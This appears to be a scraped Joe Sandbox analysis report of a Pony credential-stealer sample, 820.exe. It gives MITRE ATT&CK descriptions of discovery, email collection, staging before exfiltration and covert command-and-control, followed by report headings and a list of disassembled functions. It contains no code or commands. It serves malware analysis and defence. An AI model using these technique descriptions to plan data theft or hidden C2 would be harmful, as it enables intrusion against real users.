Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 820.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Pony

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\6575781.bat

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

UDP Packets

DNS Queries

DNS Answers

Statistics

Windows Analysis Report
820.exe

Function 0040EB0D Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 174
registryCOMMON

Function 0040D328 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 142
encryptionstringCOMMON

Function 00404DDD Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 107
filestringCOMMON

Function 00404567 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 139
libraryloaderCOMMON

Function 0040FEE0 Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 156
stringfilelibraryCOMMON

Function 0040590E Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 76
registryCOMMON

Function 00402041 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 172
registrystringCOMMON

Function 0040FCF4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 126
stringCOMMON

Function 00402B7F Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77
stringCOMMON

Function 004065F9 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149
registryCOMMON

Function 0040CFDC Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 147
registryCOMMON

Function 00407B24 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 146
registryCOMMON

Function 0040DBCC Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 133
registryCOMMON

Function 00407E76 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 126
registryCOMMON

Function 00402665 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 84
registryfileCOMMON